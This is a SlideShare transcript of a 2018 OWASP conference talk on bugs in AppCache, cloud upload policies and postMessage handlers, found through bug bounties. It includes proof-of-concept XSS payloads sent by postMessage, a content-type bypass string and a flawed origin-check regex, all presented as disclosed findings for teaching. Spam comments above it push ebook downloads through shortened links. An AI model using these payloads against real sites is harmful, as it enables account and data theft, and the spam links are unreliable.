Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies

12,115 views

Published on

In this talk, top ranked white-hat hacker Frans Rosén (@fransrosen) will focus on methodologies and results of attacking modern web technologies. He will do a deep-dive in postMessage, how vulnerable configurations in both AWS and Google Cloud allow attackers to take full control of your assets.
Listen to 60 minutes of new hacks, bug bounty stories and learnings that will make you realize that the protocols and policies you believed to be secure are most likely not.

Published in: Software
  • DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THIS can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THIS is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THIS Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THIS the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THIS Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD FULL BOOKS, INTO AVAILABLE FORMAT ......................................................................................................................... ......................................................................................................................... 1.DOWNLOAD FULL. PDF EBOOK here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. EPUB Ebook here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. doc Ebook here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. PDF EBOOK here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. EPUB Ebook here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. doc Ebook here { https://tinyurl.com/yxufevpm } ......................................................................................................................... ......................................................................................................................... ......................................................................................................................... .............. Browse by Genre Available eBooks ......................................................................................................................... Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult,
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD FULL BOOKS, INTO AVAILABLE FORMAT ......................................................................................................................... ......................................................................................................................... 1.DOWNLOAD FULL. PDF EBOOK here { https://tinyurl.com/y3nhqquc } ......................................................................................................................... 1.DOWNLOAD FULL. EPUB Ebook here { https://tinyurl.com/y3nhqquc } ......................................................................................................................... 1.DOWNLOAD FULL. doc Ebook here { https://tinyurl.com/y3nhqquc } ......................................................................................................................... 1.DOWNLOAD FULL. PDF EBOOK here { https://tinyurl.com/y3nhqquc } ......................................................................................................................... 1.DOWNLOAD FULL. EPUB Ebook here { https://tinyurl.com/y3nhqquc } ......................................................................................................................... 1.DOWNLOAD FULL. doc Ebook here { https://tinyurl.com/y3nhqquc } ......................................................................................................................... ......................................................................................................................... ......................................................................................................................... .............. Browse by Genre Available eBooks ......................................................................................................................... Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult,
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies

  1. 1. Attacking Modern Web Technologies Frans Rosén @fransrosen
  2. 2. Attacking "Modern" Web Technologies Frans Rosén @fransrosen
  3. 3. Modern = stuff people use Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt.
  4. 4. Author name her Frans Rosén Attacking Modern Web Technologies Frans Rosén @fransrosen • "The Swedish Ninja" • Security Advisor @detectify ( twitter: @fransrosen ) • HackerOne #7 @ /leaderboard/all-time • Blog at labs.detectify.com
  5. 5. Author name her Frans Rosén Attacking Modern Web Technologies Frans Rosén @fransrosen • Winner of MVH at H1-702 Live Hacking in Vegas! • Winner Team Sweden in San Francisco (Oath) • Best bug at H1-202 in Washington (Mapbox) • Best bug at H1-3120 in Amsterdam (Dropbox)
  6. 6. Attacking Modern Web Technologies Rundown AppCache • Bug in all browsers 
 Upload Policies • Weak Implementations • Bypassing business logic 
 Deep dive in postMessage implementations • The postMessage-tracker extension • Abusing sandboxed domains • Leaks, extraction, client-side race conditions Frans Rosén @fransrosen
  7. 7. Attacking Modern Web Technologies Rundown Frans Rosén @fransrosen Tool share! AppCache • Bug in all browsers 
 Upload Policies • Weak Implementations • Bypassing business logic 
 Deep dive in postMessage implementations • The postMessage-tracker extension • Abusing sandboxed domains • Leaks, extraction, client-side race conditions
  8. 8. AppCache – Not modern! Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt.
  9. 9. Author name her Disclaimer Attacking Modern Web Technologies Frans Rosén @fransrosen https://speakerdeck.com/filedescriptor/exploiting-the-unexploitable-with-lesser-known-browser-tricks?slide=22 Found independently by @filedescriptor Announced last AppSecEU
  10. 10. Author name her AppCache Attacking Modern Web Technologies Frans Rosén @fransrosen
  11. 11. Author name her AppCache Attacking Modern Web Technologies Frans Rosén @fransrosen
  12. 12. Author name her AppCache Attacking Modern Web Technologies Frans Rosén @fransrosen
  13. 13. Author name her Cookie Stuffing/Bombing Attacking Modern Web Technologies Frans Rosén @fransrosen Will make EVERY page return 500 Error = Manifest FALLBACK will be used
  14. 14. Author name her Bug in every browser Attacking Modern Web Technologies Frans Rosén @fransrosen Manifest placed in /u/2241902/manifest.txt Would use the FALLBACK for EVERYTHING, even outside the dir
  15. 15. Author name her Surprise – Specification was vague Attacking Modern Web Technologies Frans Rosén @fransrosen "To mitigate this, manifests can only specify fallbacks that are in the same path as the manifest itself." https://www.w3.org/TR/2015/WD-html51-20150506/browsers.html#concept-appcache-manifest-fallback
  16. 16. Author name her Surprise – Specification was vague Attacking Modern Web Technologies Frans Rosén @fransrosen "To mitigate this, manifests can only specify fallbacks that are in the same path as the manifest itself." https://www.w3.org/TR/2015/WD-html51-20150506/browsers.html#concept-appcache-manifest-fallback This was confusing, could mean the path to the fallback- URL and that was what browsers thought. They missed: "Fallback namespaces must also be in the same path as the manifest's URL."
  17. 17. Author name her AppCache demo Attacking Modern Web Technologies Frans Rosén @fransrosen
  18. 18. Author name her AppCache on Dropbox Attacking Modern Web Technologies Frans Rosén @fransrosen • Could run XML on dl.dropboxusercontent.com as HTML • XML installs manifest in browser on root • Any file downloaded from Dropbox would use the 
 fallback XML-HTML page, which would log the current
 URL to an external logging site
 • Every secret link would be leaked to the attacker
  19. 19. Author name her AppCache on Dropbox Attacking Modern Web Technologies Frans Rosén @fransrosen • Could run XML on dl.dropboxusercontent.com as HTML • XML installs manifest in browser on root • Any file downloaded from Dropbox would use the 
 fallback XML-HTML page, which would log the current
 URL to an external logging site
 • Every secret link would be leaked to the attacker Bounty: $12,845
  20. 20. Author name her Dropbox mitigations Attacking Modern Web Technologies Frans Rosén @fransrosen • No more XML-HTML on dl.dropboxusercontent.com • No more public directory for Dropbox users • Coordinated bug reporting to every browser • No more FALLBACK on root from path file • Argumented for faster deprecation of AppCache • Random subdomains for user-files
  21. 21. Author name her Dropbox mitigations Attacking Modern Web Technologies Frans Rosén @fransrosen • No more XML-HTML on dl.dropboxusercontent.com • No more public directory for Dropbox users • Coordinated bug reporting to every browser • No more FALLBACK on root from path file • Argumented for faster deprecation of AppCache • Random subdomains for user-files Chrome Fixed Edge/IE Fixed Firefox Fixed Safari Fixed https://bugs.chromium.org/p/chromium/issues/detail?id=696806#c40 Reported 28 Feb 2017, fixed ~June 2017
  22. 22. Author name her Dropbox mitigations Attacking Modern Web Technologies Frans Rosén @fransrosen • No more XML-HTML on dl.dropboxusercontent.com • No more public directory for Dropbox users • Coordinated bug reporting to every browser • No more FALLBACK on root from path file • Argumented for faster deprecation of AppCache • Random subdomains for user-files Chrome Fixed Edge/IE Fixed Firefox Fixed Safari Fixed https://bugs.chromium.org/p/chromium/issues/detail?id=696806#c40 Reported 28 Feb 2017, fixed ~June 2017 Browser bounties: $3000
  23. 23. Author name her AppCache vulns still possible Attacking Modern Web Technologies Frans Rosén @fransrosen Requirements: • HTTPS only (was changed recently) • Files uploaded can run HTML • Files could be on a isolated sandboxed domain • Files are uploaded to the same directory for all users
  24. 24. Author name her ServiceWorkers, big brother of AppCache Attacking Modern Web Technologies Frans Rosén @fransrosen Requirements: • HTTPS only • Files uploaded can run HTML • Files could be on a isolated sandboxed domain • Files are uploaded to the root path
 For example: bucket123.s3.amazonaws.com/test.html
  25. 25. Upload Policies AWS and Google Cloud Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt.
  26. 26. Author name her Upload Policies Attacking Modern Web Technologies Frans Rosén @fransrosen A way to upload files directly to a bucket, without passing the company’s server first. " Faster upload " Secure (signed policy)
  27. 27. Author name her Upload Policies Attacking Modern Web Technologies Frans Rosén @fransrosen A way to upload files directly to a bucket, without passing the company’s server first. " Faster upload " Secure (signed policy) " Easy to do wrong!
  28. 28. Author name her Upload Policies Attacking Modern Web Technologies Frans Rosén @fransrosen Looks like this:
  29. 29. Author name her Upload Policies Attacking Modern Web Technologies Frans Rosén @fransrosen Policy is a signed base64 encoded JSON
  30. 30. Author name her Pitfalls AWS S3 Attacking Modern Web Technologies Frans Rosén @fransrosen " starts-with $key does not contain anything
 
 We can replace any file in the bucket!
  31. 31. Author name her Pitfalls AWS S3 Attacking Modern Web Technologies Frans Rosén @fransrosen " starts-with $key does not contain anything
 
 We can replace any file in the bucket! " starts-with $key does not contain path-separator
 
 We can place stuff in root, 
 remember ServiceWorkers/AppCache?
  32. 32. Author name her Pitfalls AWS S3 Attacking Modern Web Technologies Frans Rosén @fransrosen " $Content-Type uses empty starts-with + content-disp
 
 We can now upload HTML-files:
 Content-type: text/html

  33. 33. Author name her Pitfalls AWS S3 Attacking Modern Web Technologies Frans Rosén @fransrosen " $Content-Type uses empty starts-with + content-disp
 
 We can now upload HTML-files:
 Content-type: text/html
 " $Content-Type uses starts-with = image/jpeg
 
 We can still upload HTML:
 Content-type: image/jpegz;text/html
  34. 34. Author name her Custom business logic (Google Cloud) Attacking Modern Web Technologies Frans Rosén @fransrosen POST /user_uploads/signed_url/ HTTP/1.1 Host: example.com Content-Type: application/json;charset=UTF-8 {"file_name":"images/test.png","content_type":"image/png"}
  35. 35. Author name her Custom business logic (Google Cloud) Attacking Modern Web Technologies Frans Rosén @fransrosen POST /user_uploads/signed_url/ HTTP/1.1 Host: example.com Content-Type: application/json;charset=UTF-8 {"file_name":"images/test.png","content_type":"image/png"} {"signed_url":"https://storage.googleapis.com/uploads/images/test.png? Expires=1515198382&GoogleAccessId=example%40example.iam.gserviceaccount.com&
 Signature=dlMAFC2Gs22eP%2ByoAhwGqo0A0ijySYYtRdkaIHVUr%2FvwKfNSKkKwTTpBpyOF..."} Signed URL back to upload to:
  36. 36. Author name her Vulnerabilities Attacking Modern Web Technologies Frans Rosén @fransrosen " We can select what file to override
  37. 37. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen " We can select what file to override " If signed URL allows viewing = read any file
 
 
 
 Just fetch the URL and we have the invoice POST /user_uploads/signed_url/ HTTP/1.1 Host: example.com Content-Type: application/json;charset=UTF-8 {"file_name":"documents/invoice1.pdf","content_type":"application/pdf"} {"signed_url":"https://storage.googleapis.com/uploads/documents/invoice1.pdf? Expires=1515198382&GoogleAccessId=example%40example.iam.gserviceaccount.com&
 Signature=dlMAFC2Gs22eP%2ByoAhwGqo0A0ijySYYtRdkaIHVUr%2FvwKfNSKkKwTTpBpyOF..."} Vulnerabilities
  38. 38. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen " We can select what file to override " If signed URL allows viewing = read any file
 
 
 
 Just fetch the URL and we have the invoice POST /user_uploads/signed_url/ HTTP/1.1 Host: example.com Content-Type: application/json;charset=UTF-8 {"file_name":"documents/invoice1.pdf","content_type":"application/pdf"} {"signed_url":"https://storage.googleapis.com/uploads/documents/invoice1.pdf? Expires=1515198382&GoogleAccessId=example%40example.iam.gserviceaccount.com&
 Signature=dlMAFC2Gs22eP%2ByoAhwGqo0A0ijySYYtRdkaIHVUr%2FvwKfNSKkKwTTpBpyOF..."} Total bounties: ~$15,000 Vulnerabilities
  39. 39. Rolling your own policy logic sucks Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt.
  40. 40. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Goal is to reach the bucket-root, or another file Custom Policy Logic
  41. 41. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Back to the 90s! Path traversal with path normalization
  42. 42. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Back to the 90s! Path traversal with path normalization Full read access to every object + listing
  43. 43. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Expected: Regex extraction of URL-parts https://example-bucket.s3.amazonaws.com/dir/file.png Result: https://s3.amazonaws.com/example-bucket/dir/file.png?Signature..
  44. 44. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Bypass: Regex extraction of URL-parts
  45. 45. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Bypass: Regex extraction of URL-parts
  46. 46. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Bypass: Regex extraction of URL-parts Full read access to every object + listing
  47. 47. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Temporary URLs with signed links
  48. 48. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Temporary URLs with signed links
  49. 49. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Temporary URLs with signed links https://secure.example.com/files/xx11
  50. 50. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Temporary URLs with signed links https://secure.example.com/files/xx11
  51. 51. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Temporary URLs with signed links https://secure.example.com/files/xx11Full read access to every object
  52. 52. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Full access to every object
  53. 53. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Full access to every object
  54. 54. Deep dive in postMessage Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt.
  55. 55. Author name her Birth of the postMessage-tracker extension Attacking Modern Web Technologies Frans Rosén @fransrosen • 1 year ago, discussion on last AppSecEU!
  56. 56. Author name her Birth of the postMessage-tracker extension Attacking Modern Web Technologies Frans Rosén @fransrosen • Catch every listener in all frames. • Find the function receiving the message • Log all messages btw all frames
  57. 57. Author name her Birth of the postMessage-tracker extension Attacking Modern Web Technologies Frans Rosén @fransrosen • Catch every listener in all frames. • Find the function receiving the message • Log all messages btw all frames
  58. 58. Author name her What have I found? Attacking Modern Web Technologies Frans Rosén @fransrosen Regular vuln cases (XSS)
  59. 59. Author name her What have I found? Attacking Modern Web Technologies Frans Rosén @fransrosen Regular vuln cases (XSS)
  60. 60. Author name her What have I found? Attacking Modern Web Technologies Frans Rosén @fransrosen Regular vuln cases (XSS)
  61. 61. Author name her What have I found? Attacking Modern Web Technologies Frans Rosén @fransrosen Regular vuln cases (XSS) if (e.data.JSloadScript) { if (e.data.JSloadScript.type == "iframe") { // create the new iframe element with the src given to us via the event local_create_element(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.JSloadScript.value], parent); } else { localLoadScript(e.data.JSloadScript.value) } }
  62. 62. Author name her What have I found? Attacking Modern Web Technologies Frans Rosén @fransrosen Regular vuln cases (XSS) if (e.data.JSloadScript) { if (e.data.JSloadScript.type == "iframe") { // create the new iframe element with the src given to us via the event local_create_element(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.JSloadScript.value], parent); } else { localLoadScript(e.data.JSloadScript.value) } } b.postMessage({"JSloadScript":{"value":"data:text/javascript,alert(document.domain)"}},'*')
  63. 63. Author name her What have I found? Attacking Modern Web Technologies Frans Rosén @fransrosen Complex ones: Data-Extraction
  64. 64. Author name her Data-Extraction Attacking Modern Web Technologies Frans Rosén @fransrosen Listener:
  65. 65. Author name her Data-Extraction Attacking Modern Web Technologies Frans Rosén @fransrosen Vulnerable origin-check:
  66. 66. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Vulnerable origin-check: Data-Extraction
  67. 67. Author name her Data-Extraction Attacking Modern Web Technologies Frans Rosén @fransrosen Looks harmless?
  68. 68. Author name her Data-Extraction Attacking Modern Web Technologies Frans Rosén @fransrosen Initiating ruleset
  69. 69. Author name her Data-Extraction Attacking Modern Web Technologies Frans Rosén @fransrosen Action-Rules:
  70. 70. Author name her Data-Extraction Attacking Modern Web Technologies Frans Rosén @fransrosen Extraction-options!
  71. 71. Author name her Data-Extraction Attacking Modern Web Technologies Frans Rosén @fransrosen Trigger: { "params": { "testRules": { "rules": [ { "name": "xxx", "triggers": { "type": "Delay", "delay": 5000 } ... } ] } } }
  72. 72. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen State: ... "states": { "type": "JSVariableExists", "name": "ClickTaleCookieDomain", "value": "example.com" }, ... Data-Extraction
  73. 73. Author name her Data-Extraction Attacking Modern Web Technologies Frans Rosén @fransrosen Action: ... "action": { "actualType": "CTEventAction", "type": "TestRuleEvent", "dynamicEventName": { "parts": [ { "type": "ElementValue", "ctSelector": { "querySelector": ".content-wrapper script" } }, { "type": "CookieValue", "name": "csrf_token" } ] }
  74. 74. Author name her Data-Extraction Attacking Modern Web Technologies Frans Rosén @fransrosen Payload:
  75. 75. Author name her Data-Extraction Attacking Modern Web Technologies Frans Rosén @fransrosen CSRF-token!
  76. 76. Author name her XSS on isolated but "trusted" domain Attacking Modern Web Technologies Frans Rosén @fransrosen Sandboxed domain being trusted and not trusted at the same time. postMessage used to transfer data from/to trusted domain.
  77. 77. Author name her Document service Attacking Modern Web Technologies Frans Rosén @fransrosen ACME.COM Create new doc
  78. 78. Author name her XSS on sandbox Attacking Modern Web Technologies Frans Rosén @fransrosen usersandbox.com
  79. 79. Author name her User creates a document Attacking Modern Web Technologies Frans Rosén @fransrosen ACME.COM usersandbox.com Create new doc
  80. 80. Author name her Sandbox opens up in iframe for doc-converter Attacking Modern Web Technologies Frans Rosén @fransrosen ACME.COM usersandbox.com usersandbox.com Create new doc
  81. 81. Author name her Hijack the iframe js, due to SOP Attacking Modern Web Technologies Frans Rosén @fransrosen ACME.COM usersandbox.com usersandbox.com Create new doc
  82. 82. Author name her User uploads file, postMessage data to converter Attacking Modern Web Technologies Frans Rosén @fransrosen ACME.COMusersandbox.com usersandbox.com
  83. 83. Author name her Iframe leaks data to attacker’s sandbox window Attacking Modern Web Technologies Frans Rosén @fransrosen ACME.COMusersandbox.com usersandbox.com
  84. 84. Author name her And we have the document-data! Attacking Modern Web Technologies Frans Rosén @fransrosen
  85. 85. Author name her What have I found? Attacking Modern Web Technologies Frans Rosén @fransrosen Client-side Race Conditions!
  86. 86. Author name her Localized welcome screen, JS loaded w/ postMsg Attacking Modern Web Technologies Frans Rosén @fransrosen Loading…
  87. 87. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen mpel.com Welcome! Välkommen! Willkommen! localeservice.com Localized welcome screen, JS loaded w/ postMsg
  88. 88. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Welcome! Välkommen! Willkommen! link.com.example.com = OK localeservice.com Localized welcome screen, JS loaded w/ postMsg
  89. 89. Author name her Only works once Attacking Modern Web Technologies Frans Rosén @fransrosen Welcome! Välkommen! Willkommen! localeservice.com
  90. 90. Author name her Only works once Attacking Modern Web Technologies Frans Rosén @fransrosen Welcome! Välkommen! Willkommen! localeservice.com
  91. 91. Author name her Curr not escaped Attacking Modern Web Technologies Frans Rosén @fransrosen Welcome! Välkommen! Willkommen!
  92. 92. Author name her Loaded JS, osl vuln param Attacking Modern Web Technologies Frans Rosén @fransrosen ...&curr=&osl='-alert(1)-'
  93. 93. Author name her alert was blocked. yawn… Attacking Modern Web Technologies Frans Rosén @fransrosen
  94. 94. Author name her alert was blocked. yawn… easy fix Attacking Modern Web Technologies Frans Rosén @fransrosen
  95. 95. Author name her Attacker-site Attacking Modern Web Technologies Frans Rosén @fransrosen link.com.example.com
  96. 96. Author name her Attacker site opens victim site Attacking Modern Web Technologies Frans Rosén @fransrosen link.com.example.com Loading…
  97. 97. setInterval(function() { if(b) b.postMessage('{"sitelist":"www.example.com/ global","siteurl":"www.example.com/uk","curr":"curr=&osl='-(function() {document.body.appendChild(iframe=document.createElement('iframe'));window .alert=iframe.contentWindow['alert'];document.body.removeChild(iframe);win dow.alert(document.domain)})()-'"}','*') }, 10); Author name her Loaded JS Attacking Modern Web Technologies Frans Rosén @fransrosen link.com.example.com Loading…
  98. 98. setInterval(function() { if(b) b.postMessage('{"sitelist":"www.example.com/ global","siteurl":"www.example.com/uk","curr":"curr=&osl='-(function() {document.body.appendChild(iframe=document.createElement('iframe'));window .alert=iframe.contentWindow['alert'];document.body.removeChild(iframe);win dow.alert(document.domain)})()-'"}','*') }, 10); Author name her Loaded JS Attacking Modern Web Technologies Frans Rosén @fransrosen link.com.example.com Loads mpel.js... Loading…
  99. 99. setInterval(function() { if(b) b.postMessage('{"sitelist":"www.example.com/ global","siteurl":"www.example.com/uk","curr":"curr=&osl='-(function() {document.body.appendChild(iframe=document.createElement('iframe'));window .alert=iframe.contentWindow['alert'];document.body.removeChild(iframe);win dow.alert(document.domain)})()-'"}','*') }, 10); Author name her Loaded JS Attacking Modern Web Technologies Frans Rosén @fransrosen link.com.example.com Välkommen! Willkommen! Welcome! localeservice.com Loads mpel.js...
  100. 100. setInterval(function() { if(b) b.postMessage('{"sitelist":"www.example.com/ global","siteurl":"www.example.com/uk","curr":"curr=&osl='-(function() {document.body.appendChild(iframe=document.createElement('iframe'));window .alert=iframe.contentWindow['alert'];document.body.removeChild(iframe);win dow.alert(document.domain)})()-'"}','*') }, 10); Author name her We won! Attacking Modern Web Technologies Frans Rosén @fransrosen link.com.example.com Välkommen! Willkommen! Welcome! localeservice.com Loads mpel.js...
  101. 101. Author name her Client-Side Race Condition Attacking Modern Web Technologies Frans Rosén @fransrosen postMessage between JS-load and iframe-load Worked in all browsers.
  102. 102. Author name her Client-Side Race Condition #2 Attacking Modern Web Technologies Frans Rosén @fransrosen Multiple bugs incoming, hang on!
  103. 103. Author name her Can you find the bug(s)? Attacking Modern Web Technologies Frans Rosén @fransrosen SecureCreditCardController.prototype.isValidOrigin = function (origin) { if (origin === null || origin === undefined) { return false; } var domains = [".example.com", ".example.to", ".example.at", ".example.ca", ".example.ch", ".example.be", ".example.de", ".example.es", ".example.fr", ".example.ie", ".example.it", ".example.nl", ".example.se", ".example.dk", ".example.no", ".example.fi", ".example.cz", ".example.pt", ".example.pl", ".example.cl", ".example.my", ".example.co.jp", ".example.co.nz", ".example.co.uk", ".example.com.au", ".example.com.br", ".example.com.ph", ".example.com.mx", ".example.com.sg", ".example.com.ar", ".example.com.tr", ".example.com.hk", ".example.com.tw"]; var escapedDomains = $.map(domains, function (domain) { return domain.replace('.', '.'); }); var exampleDomainsRE = '^https://.*(' + escapedDomains.join('|') + ')$'; return Boolean(origin.match(exampleDomainsRE)); };
  104. 104. Author name her 1st bug! Attacking Modern Web Technologies Frans Rosén @fransrosen SecureCreditCardController.prototype.isValidOrigin = function (origin) { if (origin === null || origin === undefined) { return false; } var domains = [".example.com", ".example.to", ".example.at", ".example.ca", ".example.ch", ".example.be", ".example.de", ".example.es", ".example.fr", ".example.ie", ".example.it", ".example.nl", ".example.se", ".example.dk", ".example.no", ".example.fi", ".example.cz", ".example.pt", ".example.pl", ".example.cl", ".example.my", ".example.co.jp", ".example.co.nz", ".example.co.uk", ".example.com.au", ".example.com.br", ".example.com.ph", ".example.com.mx", ".example.com.sg", ".example.com.ar", ".example.com.tr", ".example.com.hk", ".example.com.tw"]; var escapedDomains = $.map(domains, function (domain) { return domain.replace('.', '.'); }); var exampleDomainsRE = '^https://.*(' + escapedDomains.join('|') + ')$'; return Boolean(origin.match(exampleDomainsRE)); };
  105. 105. Author name her 1st bug! Attacking Modern Web Technologies Frans Rosén @fransrosen ".example.co.nz".replace('.', '.') ".example.co.nz"
  106. 106. Author name her Can you find the next bug? Attacking Modern Web Technologies Frans Rosén @fransrosen SecureCreditCardController.prototype.isValidOrigin = function (origin) { if (origin === null || origin === undefined) { return false; } var domains = [".example.com", ".example.to", ".example.at", ".example.ca", ".example.ch", ".example.be", ".example.de", ".example.es", ".example.fr", ".example.ie", ".example.it", ".example.nl", ".example.se", ".example.dk", ".example.no", ".example.fi", ".example.cz", ".example.pt", ".example.pl", ".example.cl", ".example.my", ".example.co.jp", ".example.co.nz", ".example.co.uk", ".example.com.au", ".example.com.br", ".example.com.ph", ".example.com.mx", ".example.com.sg", ".example.com.ar", ".example.com.tr", ".example.com.hk", ".example.com.tw"]; var escapedDomains = $.map(domains, function (domain) { return domain.replace('.', '.'); }); var exampleDomainsRE = '^https://.*(' + escapedDomains.join('|') + ')$'; return Boolean(origin.match(exampleDomainsRE)); };
  107. 107. SecureCreditCardController.prototype.isValidOrigin = function (origin) { if (origin === null || origin === undefined) { return false; } var domains = [".example.com", ".example.to", ".example.at", ".example.ca", ".example.ch", ".example.be", ".example.de", ".example.es", ".example.fr", ".example.ie", ".example.it", ".example.nl", ".example.se", ".example.dk", ".example.no", ".example.fi", ".example.cz", ".example.pt", ".example.pl", ".example.cl", ".example.my", ".example.co.jp", ".example.co.nz", ".example.co.uk", ".example.com.au", ".example.com.br", ".example.com.ph", ".example.com.mx", ".example.com.sg", ".example.com.ar", ".example.com.tr", ".example.com.hk", ".example.com.tw"]; var escapedDomains = $.map(domains, function (domain) { return domain.replace('.', '.'); }); var exampleDomainsRE = '^https://.*(' + escapedDomains.join('|') + ')$'; return Boolean(origin.match(exampleDomainsRE)); }; Author name her 2nd bug! Attacking Modern Web Technologies Frans Rosén @fransrosen
  108. 108. Author name her .nz is allowed since 2015! Attacking Modern Web Technologies Frans Rosén @fransrosen https://en.wikipedia.org/wiki/.nz
  109. 109. Author name her 2nd bug! Attacking Modern Web Technologies Frans Rosén @fransrosen Boolean("https://www.exampleaco.nz".match('^https:/ /.*(.example.co.nz)$')) true
  110. 110. Author name her 2nd bug! Attacking Modern Web Technologies Frans Rosén @fransrosen Boolean("https://www.exampleaco.nz".match('^https:/ /.*(.example.co.nz)$')) true
